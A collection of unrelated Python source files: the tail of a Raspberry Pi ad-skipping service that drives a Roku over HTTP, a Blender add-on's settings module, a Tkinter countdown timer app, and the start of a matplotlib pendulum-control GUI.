img = image.load_img(pathToImage, target_size=(256,256) , grayscale=True) #, grayscale=True
X= image.img_to_array(img)
X = np.expand_dims(X,axis=0)
images = np.vstack([X])
val = model.predict(images)
print(softmax(val[0]))
print(sum(val))
val = sum(val)
if val[1] == 1:
print('SKIP')
#if HID Microcontroller selected
if skipMethodInfo[0][0] == 1:
ser = serial.Serial('/dev/ttyACM0', 9600, timeout=1)
ser.flush()
ser.write(str(1).encode('utf-8'))
#if WiFi over Roku is selected (Default)
elif skipMethodInfo[0][0] == 0:
print("http://" + selectedIP + ":8060/keypress/enter" )
try:
url = "http://" + selectedIP + ":8060/keypress/enter"
res = requests.post(url, json='')
print('response from server:',res.text)
except:
print('error on skip post')
#shutil.move('/home/pi/Desktop/reactFlaskFinal/api/holdImages/img.jpg', "/media/pi/A986-6E38/MentoredTrainingData/Skip/img_S"+str(randrange(99999999999999))+".jpg")
cur = con.cursor()
cur.execute("UPDATE skip_count set skips = skips + 1 ")
con.commit()
else:
print('no skip')
#shutil.move('/home/pi/Desktop/reactFlaskFinal/api/holdImages/img.jpg', "/media/pi/A986-6E38/MentoredTrainingData/NoSkip/img_S"+str(randrange(99999999999999))+".jpg")
cur = con.cursor()
cur.execute("UPDATE NOskip_count set NOskips = NOskips + 1 ")
con.commit()
con.close()
def softmax(x):
e_x = np.exp(x - np.max(x))
return e_x / e_x.sum(axis=0)
class setInterval :
def __init__(self,interval,action) :
self.interval=interval
self.action=action
self.stopEvent=threading.Event()
thread=threading.Thread(target=self.__setInterval)
thread.start()
def __setInterval(self) :
nextTime=time.time()+self.interval
while not self.stopEvent.wait(nextTime-time.time()) :
nextTime+=self.interval
self.action()
def cancel(self) :
self.stopEvent.set()
# start action every 0.6s
inter=setInterval(4,action)
#print('just after setInterval -> time : {:.1f}s'.format(time.time()-StartTime))
# will stop interval in 5s
#t=threading.Timer(0,inter.cancel)
#t.start()
class StartSkip(Resource):
def post(self):
con = sqlite3.connect("skippi.db")
con.row_factory = sqlite3.Row
cur = con.cursor()
cur.execute("SELECT running FROM run_status")
runStatus = cur.fetchall()
print(runStatus[0][0])
con.row_factory = sqlite3.Row
cur = con.cursor()
cur.execute("SELECT ip FROM tv_ip")
selectedIP = cur.fetchall()
selectedIP = selectedIP[0][0]
print(selectedIP[0][0])
if runStatus[0][0] == "0" :
cur = con.cursor()
cur.execute("UPDATE run_status set running = 1")
con.commit()
else:
cur = con.cursor()
cur.execute("UPDATE run_status set running = 0")
con.commit()
final_ret = {"runStatus":runStatus[0][0] }
return final_ret
|
settings.py
|
# MIT License
# Copyright (c) 2017 GiveMeAllYourCats
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the 'Software'), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# Code author: Hotox
# Edits by: Hotox
import os
import bpy
import json
import copy
import time
import pathlib
import collections
from threading import Thread
from datetime import datetime, timezone
from collections import OrderedDict
from .. import globs
from ..tools.register import register_wrap
# from ..googletrans import Translator # Todo Remove this
from ..extern_tools.google_trans_new.google_trans_new import google_translator
from . import translate as Translate
from .translations import t
main_dir = pathlib.Path(os.path.dirname(__file__)).parent.resolve()
resources_dir = os.path.join(str(main_dir), "resources")
settings_file = os.path.join(resources_dir, "settings.json")
settings_data = None
settings_data_unchanged = None
# Settings name = [Default Value, Require Blender Restart]
settings_default = OrderedDict()
settings_default['show_mmd_tabs'] = [True, False]
settings_default['embed_textures'] = [False, False]
settings_default['ui_lang'] = ["auto", False]
# settings_default['use_custom_mmd_tools'] = [False, True]
lock_settings = False
@register_wrap
class RevertChangesButton(bpy.types.Operator):
bl_idname = 'cats_settings.revert'
bl_label = t('RevertChangesButton.label')
bl_description = t('RevertChangesButton.desc')
bl_options = {'INTERNAL'}
def execute(self, context):
for setting in settings_default.keys():
setattr(bpy.context.scene, setting, settings_data_unchanged.get(setting))
save_settings()
self.report({'INFO'}, t('RevertChangesButton.success'))
return {'FINISHED'}
@register_wrap
class ResetGoogleDictButton(bpy.types.Operator):
bl_idname = 'cats_settings.reset_google_dict'
bl_label = t('ResetGoogleDictButton.label')
bl_description = t('ResetGoogleDictButton.desc')
bl_options = {'INTERNAL'}
def execute(self, context):
Translate.reset_google_dict()
Translate.load_translations()
self.report({'INFO'}, t('ResetGoogleDictButton.resetInfo'))
return {'FINISHED'}
@register_wrap
class DebugTranslations(bpy.types.Operator):
bl_idname = 'cats_settings.debug_translations'
bl_label = t('DebugTranslations.label')
bl_description = t('DebugTranslations.desc')
bl_options = {'INTERNAL'}
def execute(self, context):
bpy.context.scene.debug_translations = True
translator = google_translator()
try:
translator.translate('猫')
except:
self.report({'INFO'}, t('DebugTranslations.error'))
bpy.context.scene.debug_translations = False
self.report({'INFO'}, t('DebugTranslations.success'))
return {'FINISHED'}
def load_settings():
# print('READING SETTINGS FILE')
global settings_data, settings_data_unchanged
# Load settings file and reset it if errors are found
try:
with open(settings_file, encoding="utf8") as file:
settings_data = json.load(file, object_pairs_hook=collections.OrderedDict)
# print('SETTINGS LOADED!')
except FileNotFoundError:
print("SETTINGS FILE NOT FOUND!")
reset_settings(full_reset=True)
return
except json.decoder.JSONDecodeError:
print("ERROR FOUND IN SETTINGS FILE")
reset_settings(full_reset=True)
return
if not settings_data:
print("NO DATA IN SETTINGS FILE")
reset_settings(full_reset=True)
return
to_reset_settings = []
# Check for missing entries, reset if necessary
for setting in ['last_supporter_update']:
if setting not in settings_data and setting not in to_reset_settings:
to_reset_settings.append(setting)
print('RESET SETTING', setting)
# Check for other missing entries, reset if necessary
for setting in settings_default.keys():
if setting not in settings_data and setting not in to_reset_settings:
to_reset_settings.append(setting)
print('RESET SETTING', setting)
# Check if timestamps are correct
utc_now = datetime.strptime(datetime.now(timezone.utc).strftime(globs.time_format), globs.time_format)
for setting in ['last_supporter_update']:
if setting not in to_reset_settings and settings_data.get(setting):
try:
timestamp = datetime.strptime(settings_data.get(setting), globs.time_format)
except ValueError:
to_reset_settings.append(setting)
print('RESET TIME', setting)
continue
# If timestamp is in future
time_delta = (utc_now - timestamp).total_seconds()
if time_delta < 0:
to_reset_settings.append(setting)
print('TIME', setting, 'IN FUTURE!', time_delta)
else:
pass
# print('TIME', setting, 'IN PAST!', time_delta)
# If there are settings to reset, reset them
if to_reset_settings:
reset_settings(to_reset_settings=to_reset_settings)
return
# Save the settings into the unchanged settings in order to know if the settings changed later
settings_data_unchanged = copy.deepcopy(settings_data)
def save_settings():
with open(settings_file, 'w', encoding="utf8") as outfile:
json.dump(settings_data, outfile, ensure_ascii=False, indent=4)
def reset_settings(full_reset=False, to_reset_settings=None):
if not to_reset_settings:
full_reset = True
global settings_data, settings_data_unchanged
if full_reset:
settings_data = OrderedDict()
settings_data['last_supporter_update'] = None
for setting, value in settings_default.items():
settings_data[setting] = value[0]
else:
for setting in to_reset_settings:
if setting in settings_default.keys():
settings_data[setting] = settings_default[setting][0]
else:
settings_data[setting] = None
save_settings()
settings_data_unchanged = copy.deepcopy(settings_data)
print('SETTINGS RESET')
def start_apply_settings_timer():
global lock_settings
lock_settings = True
thread = Thread(target=apply_settings, args=[])
thread.start()
def apply_settings():
applied = False
while not applied:
if hasattr(bpy.context, 'scene'):
try:
settings_to_reset = []
for setting in settings_default.keys():
try:
setattr(bpy.context.scene, setting, settings_data.get(setting))
except TypeError:
settings_to_reset.append(setting)
if settings_to_reset:
reset_settings(to_reset_settings=settings_to_reset)
print("RESET SETTING ON TIMER:", setting)
except AttributeError:
time.sleep(0.3)
continue
applied = True
# print('Refreshed Settings!')
else:
time.sleep(0.3)
# Unlock settings
global lock_settings
lock_settings = False
def settings_changed():
for setting, value in settings_default.items():
if value[1] and settings_data.get(setting) != settings_data_unchanged.get(setting):
return True
return False
def update_settings(self, context):
# Use False and None for this variable, because Blender would complain otherwise
# None means that the settings did change
settings_changed_tmp = False
if lock_settings:
return settings_changed_tmp
for setting in settings_default.keys():
old = settings_data[setting]
new = getattr(bpy.context.scene, setting)
if old != new:
settings_data[setting] = getattr(bpy.context.scene, setting)
settings_changed_tmp = True
if settings_changed_tmp:
save_settings()
return settings_changed_tmp
def set_last_supporter_update(last_supporter_update):
settings_data['last_supporter_update'] = last_supporter_update
save_settings()
def get_last_supporter_update():
return settings_data.get('last_supporter_update')
def get_use_custom_mmd_tools():
return settings_data.get('use_custom_mmd_tools')
def get_embed_textures():
return settings_data.get('embed_textures')
def get_ui_lang():
return settings_data.get('ui_lang')
|
main.py
|
# TimerX v1.1
# IMPORTS
ver = "1.1"
import time
import tkinter
import webbrowser
from pathlib import Path
from platform import system
from threading import Thread
from tkinter import Frame, PhotoImage, Tk, ttk
from tkinter.constants import DISABLED, END, LEFT
from tkinter.filedialog import askopenfile
import darkdetect
import sv_ttk
from playsound import playsound
if system() == "Windows":
from win10toast_click import ToastNotifier
import ctypes
from utils import *
if not Path("config.json").exists():
createConfig()
config = loadConfig(ver)
theme = config["theme"]
if config["theme"] == "System":
if darkdetect.isDark():
theme = "Dark"
else:
theme = "Light"
# TKINTER WINDOW
app = Tk()
app.title("")
app.minsize(width=300, height=210)
sv_ttk.set_theme(theme.lower())
bg_color = ttk.Style().lookup(".", "background")
# SYSTEM CODE
def seticon(win):
try:
if system() == "darwin":
win.iconbitmap("./assets/logo_new.icns")
elif system() == "Windows":
win.iconbitmap("./assets/logo_new.ico")
else:
logo_img = PhotoImage(file="./assets/logo_new.png")
win.iconphoto(False, logo_img)
except tkinter.TclError:
try:
win.iconphoto("assets/logo.ico")
except tkinter.TclError:
pass
def fullredraw(e):
global prev_state
print(prev_state)
if prev_state == "zoomed":
print("this")
true_value = ctypes.c_int(1)
ctypes.windll.dwmapi.DwmSetWindowAttribute(
app.wm_frame(), 3, ctypes.byref(true_value), ctypes.sizeof(true_value)
)
app.iconify()
app.deiconify()
false_value = ctypes.c_int(0)
ctypes.windll.dwmapi.DwmSetWindowAttribute(
app.wm_frame(), 3, ctypes.byref(false_value), ctypes.sizeof(false_value)
)
prev_state = app.state()
seticon(app)
# VARIABLES
app_on = True
timer_on = False
timer_paused = False
timer_seconds = int(config["default_seconds"])
timer_minutes = int(config["default_minutes"])
timer_hours = int(config["default_hours"])
# FUNCTIONS
def playBuzzer():
playsound(config["sound_path"])
def startstopButtonPressed(*_):
global timer_on, timer_paused, timer_hours, timer_minutes, timer_seconds, last_paused
if timer_on and not timer_paused:
timer_on = False
timer_paused = True
last_paused = time.time()
timer_hours = hours_left
timer_minutes = minutes_left
timer_seconds = seconds_left
play_button.configure(text="Play")
elif not timer_paused and not timer_on:
play_button.configure(text="Pause")
timer_thread = Thread(target=runTimer, daemon=True)
timer_thread.start()
else:
timer_paused = False
timer_on = True
play_button.configure(text="Pause")
def saveTimer(secs, mins, hours, manager_app_window):
global timer_seconds, timer_minutes, timer_hours
timer_seconds = int(secs)
timer_minutes = int(mins)
timer_hours = int(hours)
time_selected_display.configure(
text=f"{hours} Hours, {mins} Minutes, {secs} Seconds"
)
time_display.configure(text=f"{hours} : {mins} : {secs}")
if not manager_app_window == None:
manager_app_window.destroy()
def showNotification():
if system() == "Windows":
notification = ToastNotifier()
notification.show_toast(
"TimerX",
"Time's up!",
icon_path="./assets/logo_new.ico",
duration="None",
threaded=True,
callback_on_click=app.focus_force(),
)
def runTimer():
global timer_seconds, timer_minutes, timer_hours, timer_on, app, config, last_paused, seconds_left, minutes_left, hours_left
timer_seconds = config["default_seconds"]
timer_minutes = config["default_minutes"]
timer_hours = config["default_hours"]
seconds_left = timer_seconds
minutes_left = timer_minutes
hours_left = timer_hours
milliseconds_left = 99
timer_on = True
last_paused = time.time()
while True:
if timer_on and not timer_paused:
latest_time = time.time()
time_to_subtract = round((latest_time - last_paused), 3)
split_time = str(time_to_subtract).split(".")
ty_res = time.gmtime(int(split_time[0]))
formatted_time = time.strftime(f"%H:%M:%S:{split_time[1]}", ty_res)
milliseconds_left -= int(split_time[1])
split_fmt_time = formatted_time.split(":")
hours_left = int(timer_hours) - int(split_fmt_time[0])
minutes_left = int(timer_minutes) - int(split_fmt_time[1])
seconds_left = int(timer_seconds) - int(split_fmt_time[2])
if seconds_left < 0 and minutes_left == 0 and hours_left == 0:
break
if seconds_left < 0:
subtract_secs = abs(seconds_left)
seconds_left = 60 - subtract_secs
minutes_left -= 1
if minutes_left < 0:
subtract_mins = abs(minutes_left)
minutes_left = 60 - subtract_mins
hours_left -= 1
time_display.configure(
text=f"{hours_left} : {minutes_left} : {seconds_left}"
)
timer_on = False
play_button.config(text="Play")
if config["notify"]:
showNotification()
if config["sound"]:
playBuzzer()
def setAlwaysOnTop():
app.attributes("-topmost", config["ontop"])
setAlwaysOnTop()
# WINDOWS
def createManagerWindow(saveTimer, current_mins, current_secs, current_hrs):
global manager_app_window, config
manager_app_window = tkinter.Toplevel()
manager_app_window.geometry("250x170")
manager_app_window.title("Edit Timer")
manager_app_window.wait_visibility()
manager_app_window.attributes("-alpha", config["transperency"])
manager_app_window.resizable(False, False)
seticon(manager_app_window)
# VALIDATION
validate_command = manager_app_window.register(validate)
# WINDOW FRAME
manager_window = ttk.Frame(manager_app_window)
manager_window.pack(fill="both", expand=True)
timer_hr_label = ttk.Label(manager_window, text="Hours: ")
timer_hr_label.place(x=17, y=17)
timer_hr_input = ttk.Entry(
manager_window, validate="key", validatecommand=(validate_command, "%P")
)
timer_hr_input.place(x=65, y=10)
timer_hr_input.insert(1, current_hrs)
timer_min_label = ttk.Label(manager_window, text="Minutes: ")
timer_min_label.place(x=13, y=57)
timer_min_input = ttk.Entry(
manager_window, validate="key", validatecommand=(validate_command, "%P")
)
timer_min_input.place(x=65, y=50)
timer_min_input.insert(1, current_mins)
timer_sec_label = ttk.Label(manager_window, text="Seconds: ")
timer_sec_label.place(x=12, y=97)
timer_sec_input = ttk.Entry(
manager_window, validate="key", validatecommand=(validate_command, "%P")
)
timer_sec_input.place(x=65, y=90)
timer_sec_input.insert(1, current_secs)
ok_button = ttk.Button(
manager_window,
text="Ok!",
command=lambda: saveTimer(
timer_sec_input.get(),
timer_min_input.get(),
timer_hr_input.get(),
manager_app_window,
),
style="Accent.TButton",
)
ok_button.place(x=95, y=126)
def createSettingsWindow():
global theme, config, sp
settings_window = tkinter.Toplevel()
settings_window.geometry("500x320")
settings_window.title("Settings")
settings_window.resizable(False, False)
settings_window.wait_visibility()
settings_window.attributes("-alpha", config["transperency"])
seticon(settings_window)
tabview = ttk.Notebook(settings_window)
tabview.pack(fill="both", expand=True)
tab_1 = ttk.Frame(tabview)
tab_2 = ttk.Frame(tabview)
tab_3 = ttk.Frame(tabview)
tab_4 = ttk.Frame(tabview)
tabview.add(tab_1, text="Appearence")
tabview.add(tab_2, text="Notifications & Sound")
tabview.add(tab_3, text="Timer Defaults")
tabview.add(tab_4, text="About")
theme_label = ttk.Label(
tab_1,
text=" Change theme of the app",
image=theme_dark,
compound=LEFT,
)
theme_label.place(x=23, y=23)
transparency_label = ttk.Label(
tab_1,
text=" Adjust Transparency of the app",
image=transparency_dark,
compound=LEFT,
)
transparency_label.place(x=23, y=73)
pin_label = ttk.Label(
tab_1, text=" Keep app always on top", image=pin_dark, compound=LEFT
)
pin_label.place(x=23, y=123)
speaker_label = ttk.Label(
tab_2,
text=" Play sound when timer ends",
image=speaker_dark,
compound=LEFT,
)
speaker_label.place(x=23, y=23)
bell_label = ttk.Label(
tab_2,
text=" Show notification when timer ends",
image=bell_dark,
compound=LEFT,
)
bell_label.place(x=23, y=73)
sound_path_label = ttk.Label(tab_2, text="Default Sound:").place(x=23, y=123)
default_secs_label = ttk.Label(tab_3, text=" Default Seconds:").place(x=23, y=23)
default_mins_label = ttk.Label(tab_3, text=" Default Minutes:").place(x=23, y=93)
default_hours_label = ttk.Label(tab_3, text=" Default Hours:").place(x=23, y=163)
logo_label = ttk.Label(tab_4, image=logo).place(x=50, y=30)
TimerX_Label = ttk.Label(
tab_4, text="TimerX", font=("Arial Rounded MT Bold", 50)
).place(x=210, y=40)
version_Label = ttk.Label(
tab_4, text=f"Version: {ver}", font=("Segoe UI", "20")
).place(x=220, y=120)
github_btn = ttk.Button(
tab_4,
text=" Fork on Github",
image=github_logo_dark,
compound=LEFT,
command=lambda: webbrowser.open("https://github.com/Futura-Py/TimerX"),
)
github_btn.place(x=50, y=200)
website_btn = ttk.Button(
tab_4,
text=" Check out our Website!",
image=globe_dark,
compound=LEFT,
command=lambda: webbrowser.open("https://Futura-Py.netlify.app/"),
)
website_btn.place(x=250, y=200)
if theme == "Dark":
theme_label.configure(image=theme_dark)
transparency_label.configure(image=transparency_dark)
speaker_label.configure(image=speaker_dark)
bell_label.configure(image=bell_dark)
pin_label.configure(image=pin_dark)
github_btn.configure(image=github_logo_dark)
website_btn.configure(image=globe_dark)
else:
theme_label.configure(image=theme_light)
transparency_label.configure(image=transparency_light)
speaker_label.configure(image=speaker_light)
bell_label.configure(image=bell_light)
pin_label.configure(image=pin_light)
github_btn.configure(image=github_logo_light)
website_btn.configure(image=globe_light)
theme_combobox = ttk.Spinbox(
tab_1,
state="readonly",
values=("Dark", "Light", "System"),
wrap=True,
)
theme_combobox.place(x=275, y=20)
theme_combobox.set(config["theme"])
def slider_changed(value):
value = float(value) / 100
settings_window.attributes("-alpha", value)
app.attributes("-alpha", value)
slider = ttk.Scale(
tab_1,
from_=40,
to=99,
orient="horizontal",
command=slider_changed,
)
slider.set(float(config["transperency"]) * 100)
slider.place(x=325, y=75)
sound_button = ttk.Checkbutton(tab_2, style="Switch.TCheckbutton")
if config["sound"]:
sound_button.state(["!alternate", "selected"])
else:
sound_button.state(["!alternate"])
sound_button.place(x=360, y=25)
notify_button = ttk.Checkbutton(tab_2, style="Switch.TCheckbutton")
if config["notify"]:
notify_button.state(["!alternate", "selected"])
else:
notify_button.state(["!alternate"])
notify_button.place(x=360, y=75)
ontop_button = ttk.Checkbutton(tab_1, style="Switch.TCheckbutton")
if config["ontop"]:
ontop_button.state(["!alternate", "selected"])
else:
ontop_button.state(["!alternate"])
ontop_button.place(x=360, y=125)
def browse():
filedialog = askopenfile(
mode="r", filetypes=[("Audio Files", ["*.mp3", "*.wav"])]
)
if not filedialog == None:
sound_path_entry.delete(0, END)
sound_path_entry.insert(1, filedialog.name)
sound_path_entry = ttk.Entry(tab_2, width=35)
sound_path_entry.insert(1, config["sound_path"])
sound_path_entry.place(x=130, y=115)
spe_error_lbl = tkinter.Label(tab_2, fg="red", font=("", 10), text="")
spe_error_lbl.place(x=130, y=150)
browse_btn = ttk.Button(tab_2, text="Browse", command=lambda: browse())
browse_btn.place(x=410, y=115)
default_secs_entry = ttk.Entry(tab_3)
default_secs_entry.insert(1, config["default_seconds"])
default_secs_entry.place(x=280, y=15)
dse_error_lbl = tkinter.Label(tab_3, fg="red", font=("", 10), text="")
dse_error_lbl.place(x=280, y=50)
default_mins_entry = ttk.Entry(tab_3)
default_mins_entry.insert(1, config["default_minutes"])
default_mins_entry.place(x=280, y=85)
dme_error_lbl = tkinter.Label(tab_3, fg="red", font=("", 10), text="")
dme_error_lbl.place(x=280, y=120)
default_hours_entry = ttk.Entry(tab_3)
default_hours_entry.insert(1, config["default_hours"])
default_hours_entry.place(x=280, y=155)
dhe_error_lbl = tkinter.Label(tab_3, fg="red", font=("", 10), text="")
dhe_error_lbl.place(x=280, y=190)
def ApplyChanges():
global theme
config["theme"] = theme = theme_combobox.get()
if theme == "System":
if darkdetect.isDark():
theme = "Dark"
else:
theme = "Light"
config["transperency"] = float(slider.get()) / 100
config["sound"] = sound_button.instate(["selected"])
config["notify"] = notify_button.instate(["selected"])
config["ontop"] = ontop_button.instate(["selected"])
config["default_seconds"] = default_secs_entry.get()
config["default_minutes"] = default_mins_entry.get()
config["default_hours"] = default_hours_entry.get()
config["sound_path"] = sp
setAlwaysOnTop()
saveTimer(
config["default_seconds"],
config["default_minutes"],
config["default_hours"],
None,
)
saveTimer(
config["default_seconds"],
config["default_minutes"],
config["default_hours"],
None,
)
saveConfig(config)
sv_ttk.set_theme(theme.lower())
if theme == "Dark":
settings_btn.configure(image=settings_image_dark)
time_display.configure(fg="white")
else:
settings_btn.configure(image=settings_image_light)
time_display.configure(fg="black")
settings_window.destroy()
def VerifyEntrys():
global sp
def Error(reason, entry, label):
if reason == "wv":
entry.state(["invalid"])
label.configure(text="Enter a number below 60")
elif reason == "wv2":
entry.state(["invalid"])
label.configure(text="Enter a number below 24")
elif reason == "not_int":
entry.state(["invalid"])
label.configure(text="Enter a number")
elif reason == "wv-":
entry.state(["invalid"])
label.configure(text="Enter a number above 0")
elif reason == "wv-2":
entry.state(["invalid"])
label.configure(text="Enter a number above -1")
elif reason == "sound":
entry.state(["invalid"])
label.configure(text="This file doesnt exist.")
validated = True
try:
void = int(default_secs_entry.get())
if not void < 60:
validated = False
Error("wv", default_secs_entry, dse_error_lbl)
if not void > 0:
validated = False
Error("wv-", default_secs_entry, dse_error_lbl)
except ValueError:
Error("not_int", default_secs_entry, dse_error_lbl)
validated = False
try:
void = int(default_mins_entry.get())
if not void < 60:
validated = False
Error("wv", default_mins_entry, dme_error_lbl)
if not void > -1:
validated = False
Error("wv-2", default_mins_entry, dme_error_lbl)
except ValueError:
Error("not_int", default_mins_entry, dme_error_lbl)
validated = False
try:
void = int(default_hours_entry.get())
if not void <= 24:
validated = False
Error("wv2", default_hours_entry, dhe_error_lbl)
if not void > -1:
validated = False
Error("wv-2", default_hours_entry, dhe_error_lbl)
except ValueError:
Error("not_int", default_hours_entry, dhe_error_lbl)
validated = False
sp = sound_path_entry.get()
sp = sp.replace("\\", "/")
if not Path(sp).exists():
Error("sound", sound_path_entry, spe_error_lbl)
validated = False
if validated == True:
ApplyChanges()
for index in [tab_1, tab_2, tab_3]:
ttk.Button(
index,
text="Apply Changes",
command=lambda: VerifyEntrys(),
style="Accent.TButton",
).place(x=250, y=230)
ttk.Button(
index, text="Cancel", command=lambda: settings_window.destroy()
).place(x=125, y=230)
if not system() == "Windows" or system() == "win":
notify_button.configure(state=DISABLED)
def reset_dse(e):
default_secs_entry.state(["!invalid"])
dse_error_lbl.configure(text="")
def reset_dme(e):
default_mins_entry.state(["!invalid"])
dme_error_lbl.configure(text="")
def reset_dhe(e):
default_hours_entry.state(["!invalid"])
dhe_error_lbl.configure(text="")
def reset_spe(e):
sound_path_entry.state(["!invalid"])
spe_error_lbl.configure(text="")
default_secs_entry.bind("<FocusOut>", reset_dse)
default_secs_entry.bind("<FocusIn>", reset_dse)
default_secs_entry.bind("<KeyRelease>", reset_dse)
default_mins_entry.bind("<FocusOut>", reset_dme)
default_mins_entry.bind("<FocusIn>", reset_dme)
default_mins_entry.bind("<KeyRelease>", reset_dme)
default_hours_entry.bind("<FocusOut>", reset_dhe)
default_hours_entry.bind("<FocusIn>", reset_dhe)
default_hours_entry.bind("<KeyRelease>", reset_dhe)
sound_path_entry.bind("<FocusOut>", reset_spe)
sound_path_entry.bind("<FocusIn>", reset_spe)
sound_path_entry.bind("<KeyRelease>", reset_spe)
# KEYBINDS
app.bind("key-space", startstopButtonPressed)
app.grid_rowconfigure(0, weight=1)
app.grid_rowconfigure(2, weight=1)
app.grid_columnconfigure(1, weight=1)
# IMAGES
settings_image_light = PhotoImage(file="./assets/images/light/settings.png")
settings_image_dark = PhotoImage(file="./assets/images/dark/settings.png")
# WINDOW FRAME
window = Frame(app)
# WINDOW ELEMENTS
time_selected_display = tkinter.Label(
master=app,
text=f"{timer_hours} Hours, {timer_minutes} Minutes, {timer_seconds} Seconds",
font=("Segoe UI Variable", 10),
fg="white",
)
time_selected_display.grid(column=1, row=0, sticky="N", pady=10)
time_display = tkinter.Label(
master=app,
text=f"{timer_hours} : {timer_minutes} : {timer_seconds}",
font=("Segoe UI Variable", 30),
fg="white",
)
time_display.grid(column=1, row=0, sticky="", rowspan=2, pady=20)
play_button = ttk.Button(
master=app,
text="Play",
width=25,
command=startstopButtonPressed,
style="Accent.TButton",
)
play_button.grid(column=1, row=0, sticky="S", rowspan=2)
manager_button = ttk.Button(
master=app,
text="Edit Timer",
command=lambda: createManagerWindow(
saveTimer, timer_minutes, timer_seconds, timer_hours
),
width=25,
)
manager_button.grid(column=1, row=2, sticky="N", pady=10)
settings_btn = ttk.Button(
master=app,
image=settings_image_dark,
command=lambda: createSettingsWindow(),
style="Toolbutton",
)
def sizechanged(e):
settings_btn.place(x=5, y=app.winfo_height() - 45)
if app.winfo_height() >= 220:
if app.winfo_height() > 250:
if app.winfo_height() > 270:
if app.winfo_height() > 290:
if app.winfo_height() > 330:
if app.winfo_height() > 350:
if app.winfo_height() > 370:
if app.winfo_height() > 390:
if app.winfo_width() > 420:
time_display.configure(
font=("Segoe UI Variable", 100)
)
time_selected_display.configure(
font=("Segoe UI Variable", 25)
)
else:
if app.winfo_width() > 420:
time_display.configure(
font=("Segoe UI Variable", 90)
)
time_selected_display.configure(
font=("Segoe UI Variable", 25)
)
else:
if app.winfo_width() > 400:
time_display.configure(font=("Segoe UI Variable", 80))
time_selected_display.configure(
font=("Segoe UI Variable", 25)
)
else:
if app.winfo_width() > 360:
time_display.configure(font=("Segoe UI Variable", 70))
time_selected_display.configure(
font=("Segoe UI Variable", 23)
)
else:
if app.winfo_width() > 360:
time_display.configure(font=("Segoe UI Variable", 60))
time_selected_display.configure(font=("Segoe UI Variable", 20))
else:
if app.winfo_width() >= 300:
time_display.configure(font=("Segoe UI Variable", 50))
time_selected_display.configure(font=("Segoe UI Variable", 17))
else:
if app.winfo_width() >= 300:
time_display.configure(font=("Segoe UI Variable", 40))
time_selected_display.configure(font=("Segoe UI Variable", 13))
else:
time_display.configure(font=("Segoe UI Variable", 30))
time_selected_display.configure(font=("Segoe UI Variable", 10))
play_button.configure(width=int(app.winfo_width() / 12))
manager_button.configure(width=int(app.winfo_width() / 12))
def makeWindowsBlur():
from sys import getwindowsversion
if getwindowsversion().build >= 22000:
from win32mica import MICAMODE, ApplyMica
app.wm_attributes("-transparent", bg_color)
app.update()
if theme == "Dark":
ApplyMica(
HWND=ctypes.windll.user32.GetParent(app.winfo_id()),
ColorMode=MICAMODE.DARK,
)
else:
ApplyMica(
HWND=ctypes.windll.user32.GetParent(app.winfo_id()),
ColorMode=MICAMODE.LIGHT,
)
else:
from BlurWindow.blurWindow import GlobalBlur
app.wm_attributes("-transparent", bg_color)
if theme == "Dark":
GlobalBlur(
ctypes.windll.user32.GetParent(app.winfo_id()),
Acrylic=True,
hexColor="#1c1c1c",
Dark=True,
)
else:
pass
# LOAD IMAGES
theme_dark = PhotoImage(file="./assets/images/dark/dark_theme.png")
theme_light = PhotoImage(file="./assets/images/light/dark_theme.png")
transparency_dark = PhotoImage(file="./assets/images/dark/transparency.png")
transparency_light = PhotoImage(file="./assets/images/light/transparency.png")
speaker_dark = PhotoImage(file="./assets/images/dark/speaker.png")
speaker_light = PhotoImage(file="./assets/images/light/speaker.png")
bell_dark = PhotoImage(file="./assets/images/dark/bell.png")
bell_light = PhotoImage(file="./assets/images/light/bell.png")
pin_dark = PhotoImage(file="./assets/images/dark/pin.png")
pin_light = PhotoImage(file="./assets/images/light/pin.png")
github_logo_dark = PhotoImage(file="./assets/images/dark/github.png")
github_logo_light = PhotoImage(file="./assets/images/light/github.png")
globe_dark = PhotoImage(file="./assets/images/dark/globe.png")
globe_light = PhotoImage(file="./assets/images/light/globe.png")
logo = PhotoImage(file="./assets/logo_new_150x150.png")
if theme == "Dark":
settings_btn.configure(image=settings_image_dark)
elif theme == "Light":
settings_btn.configure(image=settings_image_light)
time_display.configure(fg="black")
time_selected_display.configure(fg="black")
if system() == "Windows":
makeWindowsBlur()
prev_state = app.state()
print(prev_state)
# app.bind("<Expose>", fullredraw)
app.bind("<Configure>", sizechanged)
app.wait_visibility()
app.attributes("-alpha", config["transperency"])
# UPDATE
app.after(500, Thread(target=checkForUpdates, args=(ver,)).start)
# TKINTER MAINLOOP
app.mainloop()
|
pendcon.py
|
# -*- coding: utf-8 -*-
import datetime
import math
import queue
import serial
import struct
import threading
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.animation as animation
from matplotlib.gridspec import GridSpec
from matplotlib.widgets import Button, TextBox
from matplotlib.patches import Rectangle
import matplotlib.style as mplstyle
mplstyle.use('fast')
class PenConGui(object):
def __init__(self):
#
# Time series plots figure
#
self.plotfig =plt.figure(tight_layout=False, dpi=192)
pgs = GridSpec(6, 1, figure=self.plotfig, height_ratios=[1,1,1,0.2,1,0.2],
top=.99, bottom=0.01, left=0.05, right=0.99,
wspace=0.05, hspace=0.05)
self.ax_velocity = self.plotfig.add_subplot(pgs[2, :])
self.ax_velocity.ticklabel_format(axis="x", style="plain")
self.ax_velocity.set_ylim([-10000, 10000])
self.ax_angle = self.plotfig.add_subplot(pgs[0, :], sharex=self.ax_velocity)
plt.setp(self.ax_angle.get_xticklabels(), visible=False)
self.ax_angle.set_ylim([-math.pi, math.pi])
self.ax_angle.set_ymargin(0.0)
